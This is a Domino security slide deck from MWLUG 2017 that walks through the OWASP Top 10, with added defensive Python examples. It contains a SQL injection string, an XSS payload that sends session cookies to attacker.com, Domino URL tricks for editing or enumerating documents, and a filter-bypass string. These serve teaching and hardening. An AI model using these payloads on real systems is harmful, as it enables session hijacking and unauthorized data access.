MWLUG 2017
Moving Collaboration Forward
Can Domino Be Hacked?
Lessons We Can Learn From the
Security Community
Howard Greenberg
Andrew Pollack
Andrew Pollack
Northern Collaborative Technologies
• Administrator & Developer since version 2.0
• IBM Lotus Beacon Award Winner
• Services
– Security Review & Penetration Testing
– Site Performance & Security Reviews
– Expert Witness & Security Forensics
– Application Development
– Administrative Overhaul
• Products
– NCT Search
– NCT Compliance Search
– NCT Simple Sign On
– NCT SAML for Domino 7+
• Structural Firefighter
Howard Greenberg
• Been doing Notes/Domino since 1993
– Developer, Admin, Consultant, Instructor
• Co-founded TLCC in 1998
– Self-paced courses for Notes/Domino and XPages
• Security Certifications
– Certified Information Systems Auditor (CISA)
– Certified Information Security Manager (CISM)
• Certified Flight Instructor (CFI)
Session Goals
• Review the OWASP Top 10 Web Application
Security Issues
• Relate those to our Domino environments
Why do I care?
• I have a firewall, no one can touch my Domino
environment!
Reality: Vendors, Suppliers, Customers, Employees
Major Breaches
• Target – 70MM customer accounts
– Stole logins from the HVAC subcontractor
• Via phishing email, then malware got installed
– Once in, pivoted to registers, installed malware
• Captured credit card information, then uploaded it to the attackers
– Lessons learned: segment networks, encrypt sensitive data
Did the Firewall help?
https://www.sans.org/reading-room/whitepapers/casestudies/case-study-critical-controls-prevented-target-breach-35412
OPM Breach
• Office of Personnel Management (US)
– Personal data on EVERY Federal employee
• Plus more...
• Phishing attack – got login data from a
contractor – put malware on admin server
• Lack of encryption on sensitive databases
https://www.wired.com/2016/10/inside-cyberattack-shocked-us-government/
Who/What is OWASP
• “Open Web Application Security Project (OWASP) is a 501(c)(3)
worldwide not-for-profit charitable organization focused on
improving the security of software”
• Publishes a list of the 10 Most Critical Web Application Security
Risks – Widely Respected
– For each Risk it provides:
• A description
• Example vulnerabilities
• Example attacks
• Guidance on how to avoid
• References to OWASP and other related resources
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
Top 10 for 2017 (Release Candidate)
• A1-Injection
• A2-Broken Authentication and Session Management
• A3-Cross-Site Scripting (XSS)
• A4-Broken Access Control
• A5-Security Misconfiguration
• A6-Sensitive Data Exposure
• A7-Insufficient Attack Protection
• A8-Cross-Site Request Forgery (CSRF)
• A9-Using Components with Known Vulnerabilities
• A10-Underprotected APIs
https://www.owasp.org/index.php/Top_10_2017-Top_10
Sample of Information Published (link to PDF)
A1 - Injection
The best way to find out if an application is vulnerable to injection is to verify that all use of interpreters clearly separates untrusted data from the command or query.
Typically SQL injection. Got any SQL code in your apps (accessing relational data)? Like:
String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'";
The attacker modifies the ‘id’ parameter value in her browser to send: ' or '1'='1. For example:
http://example.com/app/accountView?id=' or '1'='1
This changes the meaning of the query to return all the records from the accounts table. More dangerous attacks could modify data or even invoke stored procedures.
Domino Vulnerabilities – A1
• Got SQL code?
– Use SQL parameters (prepared statements) instead of string concatenation:
"SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'"
"SELECT * FROM accounts WHERE custID= ?"
– Scrub (validate) input as a second layer; the bound parameter is the primary defense
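A runnable version of the two queries above, added here as an editor's example and not code from the slides. The concatenated query and its parameterized replacement run against a constructed in-memory SQLite table, so the ' or '1'='1 payload can be seen returning every row in one case and nothing in the other. The table layout, the sample rows and the numeric-only allow-list check are assumptions for the example.

```python
import sqlite3

# Constructed sample data (assumption: an accounts table keyed by custID, as on the slide)
CONN = sqlite3.connect(":memory:")
CONN.execute("CREATE TABLE accounts (custID TEXT, owner TEXT, balance INTEGER)")
CONN.executemany(
    "INSERT INTO accounts VALUES (?, ?, ?)",
    [("1001", "alice", 500), ("1002", "bob", 1200), ("1003", "carol", 75)],
)

# The payload from the slide: closes the quoted literal and appends an always-true OR clause
ATTACK = "' or '1'='1"


def lookup_vulnerable(cust_id: str) -> list:
    """The slide's pattern: untrusted input spliced into the query text.

    The database engine cannot tell where the data ends and the SQL begins.
    """
    query = "SELECT * FROM accounts WHERE custID='" + cust_id + "'"
    return CONN.execute(query).fetchall()


def lookup_parameterized(cust_id: str) -> list:
    """Prepared statement: ? is bound as a value, so quotes in cust_id never become syntax."""
    query = "SELECT * FROM accounts WHERE custID=?"
    return CONN.execute(query, (cust_id,)).fetchall()


def lookup_validated(cust_id: str) -> list:
    """Second layer: allow-list the shape of the input before it reaches the database.

    Customer IDs in this example are numeric; anything else is rejected up front.
    """
    if not cust_id.isdigit():
        raise ValueError("custID must be numeric")
    return lookup_parameterized(cust_id)


if __name__ == "__main__":
    print("vulnerable, normal id :", lookup_vulnerable("1001"))
    print("vulnerable, payload   :", lookup_vulnerable(ATTACK))     # every row
    print("parameterized, payload:", lookup_parameterized(ATTACK))  # no rows
```

The parameterized form is the fix; the allow-list is defense in depth and would not be enough on its own for fields that legitimately contain quotes (names, free text).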
Domino Vulnerabilities – A1
• Hack Domino URLs
– Switch from openDocument to editDocument
http://www.tlcc.com/mwlug/mwlug2017.nsf/topicThread.xsp?documentId=557D7B9B86441DFF85258154004A827A&action=openDocument
• Pivot to read all documents – open the default view
http://www.tlcc.com/mwlug/mwlug2017.nsf/$defaultview
• Use zero as the view and open any document by its UNID
http://www.tlcc.com/mwlug/mwlug2017.nsf/0/557d7b9b86441dff85258154004a827a?EditDocument
Fix: use proper Readers/Authors fields (hiding the link in the design is not access control)
Block direct view access with $$ViewTemplateDefault
A2-Broken Authentication and Session
Management - What is it?
• User authentication credentials aren’t properly protected
when stored using hashing or encryption.
• Credentials can be guessed or overwritten through weak
account management functions
• Session IDs are exposed in the URL
• Session IDs are vulnerable to session fixation attacks.
• Session IDs don’t timeout, or user sessions or
authentication tokens aren’t properly invalidated during
logout.
• Session IDs aren’t rotated after successful login.
• Passwords, session IDs, and other credentials are sent over
unencrypted connections.
A2-Protecting Stored Credentials
• Domino is fairly good at this if you let it
– Use Minimum Password Requirements
– Protect your Domino Directory
– Don’t store a password file “just in case”
– Use the “Fewer Name Variants” option
• Beware of SSO Solutions – Including SAML
– You may be turning over all authentication
controls to some other system!
A2 – Weak Management Practices
• Beware of password recovery processes
– How do you verify the person requesting the
password reset is really the person who should
have it? This can also be used to deny service.
– Any web site that can send you your old password
when you request it should not be trusted
A2 – Session IDs in the URL
• While Domino doesn’t generally do this, some
administrators do this to avoid creating
Domino users, or to give specific user content
within applications based on URLs
– e.g. URLs that contain specific invoice numbers or trouble ticket IDs to send users to specific documents
A2 – Session “Fixation” Attacks
• Can your stored authentication token be captured and re-used in Domino?
– Spoiler Alert: Yes, it can – and quite easily
– (Strictly, capturing and replaying a token is session hijacking; fixation is forcing a known session ID onto the victim. The defenses on the next slide apply to both.)
• In session-based authentication the session token is stored in a cookie.
• Anyone who can create web pages on your server can capture this using a bit of JavaScript (unless the cookie is marked HttpOnly).
– Other servers – including non-Domino servers within your domain – may be able to capture this cookie as well, because the cookie's Domain attribute decides which hosts receive it
A2 – Preventing Domino “Fixation” attacks on your Domino Servers
• Code review applications
• Follow XSS prevention best practices
• Change the default cookie domain in your Web SSO Configuration (LTPA token) documents so the token is not handed to every host in the domain
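An added example (editor's code, not from the slides) that audits the Set-Cookie headers a server sends and reports the three attributes that decide who can capture or replay a session cookie: Domain scope, the Secure flag and the HttpOnly flag. The cookie names are the ones Domino uses for session and LTPA authentication; the header values, the host name and the token contents are constructed for the example.

```python
from dataclasses import dataclass, field

# Cookie names Domino uses for session-based and LTPA single sign-on authentication
SESSION_COOKIES = {"DomAuthSessId", "LtpaToken", "LtpaToken2"}


@dataclass
class CookieFinding:
    name: str
    issues: list = field(default_factory=list)


def parse_set_cookie(header: str):
    """Split one Set-Cookie header value into (name, value, {attribute: value})."""
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value, attrs


def audit_cookie(header: str, server_host: str) -> CookieFinding:
    """Report the attributes that decide who can read or replay a session cookie."""
    name, _, attrs = parse_set_cookie(header)
    finding = CookieFinding(name)
    if name not in SESSION_COOKIES:
        return finding  # not an authentication token; nothing to check
    if "secure" not in attrs:
        finding.issues.append("no Secure flag: token is also sent over plain HTTP")
    if "httponly" not in attrs:
        finding.issues.append("no HttpOnly flag: document.cookie exposes it to injected script")
    domain = attrs.get("domain", "").lstrip(".").lower()
    host = server_host.lower()
    if domain and domain != host and host.endswith("." + domain):
        finding.issues.append(
            f"Domain={attrs['domain']} is wider than {server_host}: "
            "every host under that domain receives the token"
        )
    return finding


# Constructed headers, as a browser would receive them from mail.example.com
SAMPLE_HEADERS = [
    "LtpaToken=AAECAzQ1Njc4OTAxMjM0NTY3ODkw; Domain=.example.com; Path=/",
    "LtpaToken=AAECAzQ1Njc4OTAxMjM0NTY3ODkw; Domain=mail.example.com; Path=/; Secure; HttpOnly",
    "theme=dark; Path=/",
]
SERVER_HOST = "mail.example.com"


def audit_all(headers=SAMPLE_HEADERS, server_host=SERVER_HOST) -> list:
    """One CookieFinding per header, in order."""
    return [audit_cookie(h, server_host) for h in headers]


if __name__ == "__main__":
    for f in audit_all():
        print(f.name, f.issues or "ok")
```

A wide Domain is what makes single sign-on across hosts work, so the check does not call it wrong; it makes the scope visible so it is a decision rather than a default, and every host inside that scope (Domino or not) then has to be held to the same standard.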
A2 – Passwords, session IDs, on
unencrypted connections
• There should no longer be any reason to allow
unencrypted http connections at all. Sorry.
It’s 2017. Stop doing this.
A3 - Cross Site Scripting (XSS)
You are vulnerable to Server XSS if your server-side code uses user-supplied
input as part of the HTML output, and you don’t use context-sensitive
escaping to ensure it cannot run. If a web page uses JavaScript to dynamically
add attacker-controllable data to a page, you may have Client XSS. Ideally, you
would avoid sending attacker-controllable data to unsafe JavaScript APIs, but
escaping (and to a lesser extent) input validation can be used to make this
safe.
Example Attack Scenario
The application uses untrusted data in the construction of the following HTML
snippet without validation or escaping: (String) page += "<input
name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";
The attacker modifies the ‘CC’ parameter in his browser to:
'><script>document.location= 'http://www.attacker.com/cgi-bin/cookie.cgi?
foo='+document.cookie</script>'.
This attack causes the victim’s session ID to be sent to the attacker’s website,
allowing the attacker to hijack the user’s current session.
Domino Vulnerability – A3
• YES, any web application is!!!
• Any text input, especially rich text (rendered as HTML on the web)
• Prevention
– Always sanitize any input, and escape it for the context it is output into
• Classic Domino web – look for HTML tags and strip them out
– You have to roll your own in LotusScript
– Note: client-side JavaScript (CSJS) validation is not an option; the attacker controls the browser
• XPages have HTML filters
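The attack scenario above, run end to end as an added example (editor's code, not from the slides): the slide's HTML snippet is rebuilt as a function, once as written and once with the value escaped for the attribute context. A second pair shows why a hand-rolled "find the tag and strip it" filter is not the same thing as escaping. The nested-tag bypass string is constructed for the example.

```python
import html


def build_input_vulnerable(cc: str) -> str:
    """The slide's snippet: untrusted input dropped straight into an attribute value."""
    return "<input name='creditcard' type='TEXT' value='" + cc + "'>"


def build_input_escaped(cc: str) -> str:
    """Same markup, but the value is escaped for the HTML-attribute context.

    html.escape(quote=True) turns < > & " and ' into entities, so the payload
    can neither close the attribute nor open a new tag.
    """
    return "<input name='creditcard' type='TEXT' value='" + html.escape(cc, quote=True) + "'>"


# The slide's payload: closes the value attribute, closes the tag, then injects a script
PAYLOAD = (
    "'><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?"
    "foo='+document.cookie</script>'"
)


def contains_script_element(fragment: str) -> bool:
    """Does the rendered markup contain a real <script> tag?"""
    return "<script" in fragment.lower()


def strip_script_tags_naive(text: str) -> str:
    """A hand-rolled 'look for HTML tags, strip out' filter of the kind written in LotusScript.

    One pass, one denylisted tag: exactly the shape that can be bypassed.
    """
    return text.replace("<script>", "").replace("</script>", "")


# Constructed bypass: once the filter removes the inner tags, the outer halves join back up
NESTED = "<scr<script>ipt>alert(document.cookie)</scr</script>ipt>"


if __name__ == "__main__":
    print(build_input_vulnerable(PAYLOAD))
    print(build_input_escaped(PAYLOAD))
    print(strip_script_tags_naive(NESTED))
```

Escaping on output works because it does not try to recognise attacks; it makes every character inert for the place it lands. A stripping filter has to recognise every dangerous construct (tags, attributes such as onerror, nested tricks like the one above), which is why the XPages acf filter on the next slide is the better option when rich text has to be preserved.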
XPages HTML Filters
• XPages has built-in filtering
• You have to turn it on
– HTMLFilter – filters on output
– HTMLFilterIn – filters on saving
• Use acf (the Active Content Filter) as the option!
– identity does nothing; empty strips everything
– Turn it on for all rich text (at server, application, or XPage level):
xsp.richtext.default.htmlfilter=acf
A4-Broken Access Control
• Not just ACL settings – but includes them
– Maximum Internet Name & Password Access
– Anonymous & Default “No Access” on all databases you don’t expect web users to access
– Obscurity is not Security – (See App Dev Practices)
A5-Security Misconfiguration
• Don’t expose your operating system to the
internet.
• Turn off all services you don’t need
• Keep your Domino version fully up to date
– Tools like “Metasploit” know all about Domino
– Out of date servers can be hacked to a remote
command line in 30 seconds with menu driven
hacking tools
A5 – Use Good HTTP Password Management practices
• Assign HTTP (Internet) passwords even if you don’t use them; if you leave the field blank, it will end up filled in with garbage.
– The same Internet passwords are also what attackers try against your SMTP mail handler
A5 – Don’t Help the Hackers
• By default your server tells the world what
software you’re running.
It’s like you WANT to get hacked
A5 – Don’t Help the Hackers!
• HTTPDisableServerHeader=1 (notes.ini)
• Then get fancy: add your own Server header
A5 - Set up SSL the right way
• Use TLS
• Use the right SSL settings
• Use a score check service to validate:
https://www.ssllabs.com/ssltest/index.html
A5 – Domino Web Server Settings
May need to modify the ciphers available (notes.ini):
Disable_SSLV3=1
SSL_USE_CLIENT_CIPHER_ORDER=1
Caveat: SSL_USE_CLIENT_CIPHER_ORDER=1 honors the client's cipher preference order rather than the server's; whichever you choose, confirm the suites actually negotiated with the SSL Labs test.
A6- Sensitive Data Exposure
Am I vulnerable to Data Exposure? The first thing you have to
determine is which data is sensitive enough to require extra
protection. For example, passwords, credit card numbers, health
records, and personal information should be protected. For all such
data:
1. Is any of this data stored in clear text long term, including backups
of this data?
2. Is any of this data transmitted in clear text, internally or
externally? Internet traffic is especially dangerous.
3. Are any old / weak cryptographic algorithms used?
4. Are weak crypto keys generated, or is proper key management or
rotation missing?
5. Are any browser security directives or headers missing when
sensitive data is provided by / sent to the browser?
Domino Vulnerability – A6
Know your data, what is sensitive - RISK ANALYSIS!
• HTTPS should be turned on/forced for anything that may be sensitive - protect data in motion
• Store data in encrypted fields - protect data at rest
– Notes encryption (field level), now supported in XPages as of FP8!
• Use TLS 1.2 only; older protocols are vulnerable
– Turn off SSLv3
• Passwords in names.nsf
– Enable the more secure Internet password hashing format in the Domino Directory
• PCI - If your company takes credit cards, you are subject to PCI DSS
• PII - personal information; many rules for the EU, individual states, etc.
A7 - Insufficient Attack Protection
Am I Vulnerable to Attack?
Detecting, responding to, and blocking attacks makes
applications dramatically harder to exploit yet almost no
applications or APIs have such protection. Critical
vulnerabilities in both custom code and components are also
discovered all the time, yet organizations frequently take
weeks or even months to roll out new defenses.
It should be very obvious if attack detection and response
isn’t in place. Simply try manual attacks or run a scanner
against the application. The application or API should identify
the attacks, block any viable attacks, and provide details on
the attacker and characteristics of the attack. If you can’t
quickly roll out virtual and/or actual patches when a critical
vulnerability is discovered, you are left exposed to attack.
A7-Insufficient Attack Protection
• Is anyone monitoring your HTTP and SMTP logs to look for attacks?
• Does your company have an IDS (Intrusion Detection System)?
• Fail2Ban – the poor Linux admin’s IDS: it watches log files and bans a source IP after repeated failures
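An added example (editor's code, not from the slides) of the log monitoring this slide asks for, which also serves the A1 "Hack Domino URLs" slide: it parses HTTP access-log lines, flags the URL shapes shown there ($defaultview, /0/UNID, ?EditDocument) as probes, and applies a Fail2Ban-style rule that names any source IP with five or more 401s inside a ten-minute window. Assumptions: the log is in Common Log Format (Domino's "Common" text-log option), failed Basic-auth logins are recorded as 401 (with session/form authentication you would key on the login form being served again instead), and the log lines themselves are constructed, reusing the paths and UNID from the A1 slide.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumption: Common Log Format, one request per line
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

# URL shapes from the A1 slide that an XPages application does not emit on its own
PROBES = [
    ("default view enumeration", re.compile(r"\.nsf/\$defaultview", re.I)),
    ("open-by-UNID via /0/", re.compile(r"\.nsf/0/[0-9a-f]{32}", re.I)),
    ("edit command on document", re.compile(r"\?editdocument\b|action=editdocument", re.I)),
    ("admin database", re.compile(r"/(webadmin|names)\.nsf/", re.I)),
]


def parse_clf(line: str):
    """Return a dict with ip/user/ts/method/url/status, or None for an unparseable line."""
    m = CLF_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def find_probes(lines) -> list:
    """(ip, label, url) for every request whose URL matches one of the probe patterns."""
    hits = []
    for line in lines:
        rec = parse_clf(line)
        if rec is None:
            continue
        for label, rx in PROBES:
            if rx.search(rec["url"]):
                hits.append((rec["ip"], label, rec["url"]))
    return hits


def find_bruteforce(lines, threshold: int = 5, window: timedelta = timedelta(minutes=10)) -> set:
    """Fail2Ban-style rule: source IPs with >= threshold 401s inside any sliding window."""
    failures = defaultdict(list)
    for line in lines:
        rec = parse_clf(line)
        if rec is not None and rec["status"] == 401:
            failures[rec["ip"]].append(rec["ts"])
    flagged = set()
    for ip, times in failures.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged.add(ip)
                break
    return flagged


# Constructed log lines (not real traffic)
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Aug/2017:14:03:11 -0400] "POST /names.nsf?Login HTTP/1.1" 401 312',
    '203.0.113.7 - - [10/Aug/2017:14:03:14 -0400] "POST /names.nsf?Login HTTP/1.1" 401 312',
    '203.0.113.7 - - [10/Aug/2017:14:03:17 -0400] "POST /names.nsf?Login HTTP/1.1" 401 312',
    '203.0.113.7 - - [10/Aug/2017:14:03:20 -0400] "POST /names.nsf?Login HTTP/1.1" 401 312',
    '203.0.113.7 - - [10/Aug/2017:14:03:23 -0400] "POST /names.nsf?Login HTTP/1.1" 401 312',
    '198.51.100.4 - - [10/Aug/2017:14:05:02 -0400] "GET /mwlug/mwlug2017.nsf/$defaultview HTTP/1.1" 200 8812',
    '198.51.100.4 - - [10/Aug/2017:14:05:09 -0400] "GET /mwlug/mwlug2017.nsf/0/557d7b9b86441dff85258154004a827a?EditDocument HTTP/1.1" 200 5120',
    '192.0.2.20 - jdoe [10/Aug/2017:14:06:40 -0400] "GET /mwlug/mwlug2017.nsf/topicThread.xsp?documentId=557D7B9B86441DFF85258154004A827A&action=openDocument HTTP/1.1" 200 6400',
    '192.0.2.21 - - [10/Aug/2017:14:07:00 -0400] "POST /names.nsf?Login HTTP/1.1" 401 312',
]


if __name__ == "__main__":
    for hit in find_probes(SAMPLE_LOG):
        print("probe:", *hit)
    print("brute force from:", find_bruteforce(SAMPLE_LOG))
```

The probe list is where a Domino shop gets more value than a generic IDS signature: the URL commands are legitimate Domino syntax, so only someone who knows the application knows that nothing in it should ever generate them.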
A8 - Cross-Site Request Forgery (CSRF)
Am I Vulnerable to CSRF?
To check whether an application is vulnerable, see if any links and
forms lack an unpredictable CSRF token. Without such a token,
attackers can forge malicious requests. An alternate defense is to
require the user to prove they intended to submit the request, such as
through reauthentication.
Focus on the links and forms that invoke state-changing functions,
since those are the most important CSRF targets. Multistep
transactions are not inherently immune. Also be aware that Server-
Side Request Forgery (SSRF) is also possible by tricking apps and APIs
into generating arbitrary HTTP requests.
Note that session cookies, source IP addresses, and other information
automatically sent by the browser don’t defend against CSRF since
they are included in the forged requests.
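The token defense described above, as an added example (editor's code, not from the slides): a per-session synchronizer token is issued into the real form and checked on every state-changing POST. Two handlers are shown side by side, one that trusts the session cookie alone and one that also demands the token, and a forged request that carries the cookie (the browser attaches it) but cannot carry the token (the attacker's page cannot read it). The session store and the request shapes are constructed for the example.

```python
import hmac
import secrets

# Constructed session store: session cookie value -> user name (assumption: server-side sessions)
SESSIONS = {"sess-7f3a": "alice"}


class CsrfGuard:
    """Per-session synchronizer token: issued into the form, checked on every state change."""

    def __init__(self):
        self._tokens = {}

    def issue(self, session_id: str) -> str:
        token = secrets.token_urlsafe(32)
        self._tokens[session_id] = token
        return token

    def verify(self, session_id: str, presented) -> bool:
        expected = self._tokens.get(session_id)
        if expected is None or presented is None:
            return False
        # constant-time comparison so the token cannot be guessed byte by byte
        return hmac.compare_digest(expected, str(presented))


def transfer_cookie_only(request: dict) -> tuple:
    """The broken handler: trusts the session cookie alone, so a forged cross-site POST passes."""
    user = SESSIONS.get(request.get("cookie_session"))
    if user is None:
        return 401, "not logged in"
    return 200, f"moved {request['form']['amount']} from {user}"


def transfer_with_token(guard: CsrfGuard, request: dict) -> tuple:
    """The fixed handler: the form must carry a token the attacker's page cannot read."""
    sid = request.get("cookie_session")
    user = SESSIONS.get(sid)
    if user is None:
        return 401, "not logged in"
    if not guard.verify(sid, request["form"].get("csrf_token")):
        return 403, "missing or invalid CSRF token"
    return 200, f"moved {request['form']['amount']} from {user}"


def demo() -> dict:
    """Genuine request vs. forged ones; the browser attaches the session cookie to all of them."""
    guard = CsrfGuard()
    token = guard.issue("sess-7f3a")  # embedded in the real transfer form
    genuine = {"cookie_session": "sess-7f3a", "form": {"amount": 100, "csrf_token": token}}
    forged = {"cookie_session": "sess-7f3a", "form": {"amount": 9999, "to": "attacker"}}
    guessed = {"cookie_session": "sess-7f3a", "form": {"amount": 1, "csrf_token": "x"}}
    return {
        "genuine/token": transfer_with_token(guard, genuine)[0],
        "forged/token": transfer_with_token(guard, forged)[0],
        "guessed/token": transfer_with_token(guard, guessed)[0],
        "forged/cookie-only": transfer_cookie_only(forged)[0],
    }


if __name__ == "__main__":
    print(demo())
```

The token only helps if the page that embeds it is free of XSS (A3): a script running in the victim's origin can read the form and lift the token, which is why the two items sit next to each other in the list.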
Domino Vulnerabilities – A8
• Prevent your content from being rendered in an iframe or frameset that you did not generate.
• Domino Web Administrator (webadmin.nsf) is vulnerable; turn it off!
• Domino frameset
– DominoValidateFramesetSRC=1 (notes.ini) - makes sure the content in the frameset comes from the same database
https://www-10.lotus.com/ldd/dominowiki.nsf/dx/DominoValidateFramesetSRC
• Set the X-Frame-Options header (note: required for PCI compliance)
http://www-01.ibm.com/support/docview.wss?uid=swg21568598
A8 – X-Frame-Options Header
• Use the header “X-Frame-Options” to tell browsers not
to allow your page to be loaded in someone else’s
frame
– Frequently required by customer security audits
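An added example (editor's code, not from the slides) of the check an auditor actually runs for this slide and for the A5 "Don't Help the Hackers" slide: parse a raw HTTP response head and report a product-revealing Server header and a missing or unenforceable X-Frame-Options value (a CSP frame-ancestors directive is accepted as the modern equivalent). Assumptions: the default Domino Server value is shown as "Lotus-Domino", the custom value "Bacon" stands in for the "add your own Server header" advice, and all three responses are constructed, not captured.

```python
def parse_response_head(raw: str) -> tuple:
    """Split a raw HTTP response head into (status line, {lower-case name: [values]})."""
    lines = [ln for ln in raw.strip().splitlines() if ln.strip()]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers


# Assumption: substrings that identify the product in a default Domino Server header
DISCLOSING_SERVER_TOKENS = ("domino", "lotus")


def audit_response(raw: str) -> list:
    """Findings for the two headers discussed on the A5 and A8 slides."""
    findings = []
    _, h = parse_response_head(raw)
    for value in h.get("server", []):
        if any(tok in value.lower() for tok in DISCLOSING_SERVER_TOKENS):
            findings.append(f"Server header discloses the product: {value}")
    xfo = h.get("x-frame-options")
    csp = " ".join(h.get("content-security-policy", [])).lower()
    if xfo is None and "frame-ancestors" not in csp:
        findings.append("no X-Frame-Options (and no CSP frame-ancestors): any site can frame this page")
    elif xfo is not None and xfo[0].strip().upper() not in ("DENY", "SAMEORIGIN"):
        # ALLOW-FROM was never supported by all browsers and is now ignored by them
        findings.append(f"X-Frame-Options value is not one browsers enforce: {xfo[0]}")
    return findings


# Constructed responses (not captured from a real server)
DEFAULT_RESPONSE = """HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 10 Aug 2017 18:03:11 GMT
Content-Type: text/html; charset=UTF-8
"""

HARDENED_RESPONSE = """HTTP/1.1 200 OK
Server: Bacon
Date: Thu, 10 Aug 2017 18:03:11 GMT
Content-Type: text/html; charset=UTF-8
X-Frame-Options: SAMEORIGIN
"""

ALLOW_FROM_RESPONSE = """HTTP/1.1 200 OK
Server: Bacon
X-Frame-Options: ALLOW-FROM https://partner.example.com
"""


if __name__ == "__main__":
    for label, raw in (("default", DEFAULT_RESPONSE), ("hardened", HARDENED_RESPONSE),
                       ("allow-from", ALLOW_FROM_RESPONSE)):
        print(label, audit_response(raw) or "ok")
```

Run it against every response type the server can produce, not just the home page: error pages, login forms and REST endpoints are often served by a different code path and miss the header that was configured for the main site.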
A9 - Using Components with Known
Vulnerabilities
• The challenge is to continuously monitor the components (both client-side
and server-side) you are using for new vulnerability reports. This
monitoring can be very difficult because vulnerability reports are not
standardized, making them hard to find and search for the details you
need (e.g., the exact component in a product family that has the
vulnerability). Worst of all, many vulnerabilities never get reported to
central clearinghouses like CVE and NVD.
• Determining if you are vulnerable requires searching these databases, as
well as keeping abreast of project mailing lists and announcements for
anything that might be a vulnerability. This process can be done manually,
or with automated tools. If a vulnerability in a component is discovered,
carefully evaluate whether you are actually vulnerable. Check to see if
your code uses the vulnerable part of the component and whether the
flaw could result in an impact you care about. Both checks can be difficult
to perform as vulnerability reports can be deliberately vague.
Domino Vulnerabilities – A9
• What software is your application using? Does that have vulnerabilities?
– JS libraries like jQuery, Select2
– Java libraries (PDF, JSON, credit card...)
• What software is IBM using? (For example Java libraries, Apache Struts, etc.)
– Example: Apache Struts vulnerability
– Be sure to keep the Domino JVM updated
– Interim fixes
– Latest Fix Pack
A10 – Under-protected APIs
Am I Vulnerable to Attack?
Testing your APIs for vulnerabilities should be similar to testing the rest of
your application for vulnerabilities. All the different types of injection,
authentication, access control, encryption, configuration, and other issues
can exist in APIs just as in a traditional application.
However, because APIs are designed for use by programs (not humans) they
frequently lack a UI and also use complex protocols and complex data
structures. These factors can make security testing difficult. The use of
widely-used formats can help, such as Swagger (OpenAPI), REST, JSON, and
XML. Some frameworks like GWT and some RPC implementations use custom
formats. Some applications and APIs create their own protocol and data
formats, like WebSockets. The breadth and complexity of APIs make it difficult
to automate effective security testing, possibly leading to a false sense of
security.
Ultimately, knowing if your APIs are secure means carefully choosing a
strategy to test all defenses that matter.
Domino Vulnerabilities – A10
• Know what is turned on in your applications
and server.
– Is Domino DAS turned on?
• REST access to a database
– XPages REST, agents that serve up REST data, etc.
• Do a Code review, understand what data these
might serve up and how much access is given.
Closing
• Security is the responsibility of EVERYONE
• Especially those of us in IT, even without a
security job
– Developers have to ALWAYS design for security
– Admins have to ALWAYS plan and monitor to build
resilient systems
– Management has to provide the resources and
focus

 
September-2021 OpenNTF Webinar: Domino Online Meeting Integration (DOMI)
September-2021 OpenNTF Webinar: Domino Online Meeting Integration (DOMI)September-2021 OpenNTF Webinar: Domino Online Meeting Integration (DOMI)
September-2021 OpenNTF Webinar: Domino Online Meeting Integration (DOMI)Howard Greenberg
 
August OpenNTF Webinar - Git and GitHub Explained
August OpenNTF Webinar - Git and GitHub ExplainedAugust OpenNTF Webinar - Git and GitHub Explained
August OpenNTF Webinar - Git and GitHub ExplainedHoward Greenberg
 
July OpenNTF Webinar - HCL Presents Keep, a new API for Domino
July OpenNTF Webinar - HCL Presents Keep, a new API for DominoJuly OpenNTF Webinar - HCL Presents Keep, a new API for Domino
July OpenNTF Webinar - HCL Presents Keep, a new API for DominoHoward Greenberg
 
June OpenNTF Webinar - Domino V12 Certification Manager
June OpenNTF Webinar - Domino V12 Certification ManagerJune OpenNTF Webinar - Domino V12 Certification Manager
June OpenNTF Webinar - Domino V12 Certification ManagerHoward Greenberg
 
April, 2021 OpenNTF Webinar - Domino Administration Best Practices
April, 2021 OpenNTF Webinar - Domino Administration Best PracticesApril, 2021 OpenNTF Webinar - Domino Administration Best Practices
April, 2021 OpenNTF Webinar - Domino Administration Best PracticesHoward Greenberg
 
OpenNTF Webinar, March, 2021
OpenNTF Webinar, March, 2021OpenNTF Webinar, March, 2021
OpenNTF Webinar, March, 2021Howard Greenberg
 
February OpenNTF Webinar: Introduction to Ansible for Newbies
February OpenNTF Webinar: Introduction to Ansible for NewbiesFebruary OpenNTF Webinar: Introduction to Ansible for Newbies
February OpenNTF Webinar: Introduction to Ansible for NewbiesHoward Greenberg
 
January OpenNTF Webinar: 4D - Domino Docker Deep Dive
January OpenNTF Webinar: 4D - Domino Docker Deep DiveJanuary OpenNTF Webinar: 4D - Domino Docker Deep Dive
January OpenNTF Webinar: 4D - Domino Docker Deep DiveHoward Greenberg
 
December OpenNTF Webinar: The Volt MX LotusScript Toolkit
December OpenNTF Webinar: The Volt MX LotusScript ToolkitDecember OpenNTF Webinar: The Volt MX LotusScript Toolkit
December OpenNTF Webinar: The Volt MX LotusScript ToolkitHoward Greenberg
 
OpNovember Water Cooler Talk: The Mystery of Domino on Docker - Part 1
OpNovember Water Cooler Talk: The Mystery of Domino on Docker - Part 1OpNovember Water Cooler Talk: The Mystery of Domino on Docker - Part 1
OpNovember Water Cooler Talk: The Mystery of Domino on Docker - Part 1Howard Greenberg
 
OpenNTF Webinar, October 2020
OpenNTF Webinar, October 2020OpenNTF Webinar, October 2020
OpenNTF Webinar, October 2020Howard Greenberg
 
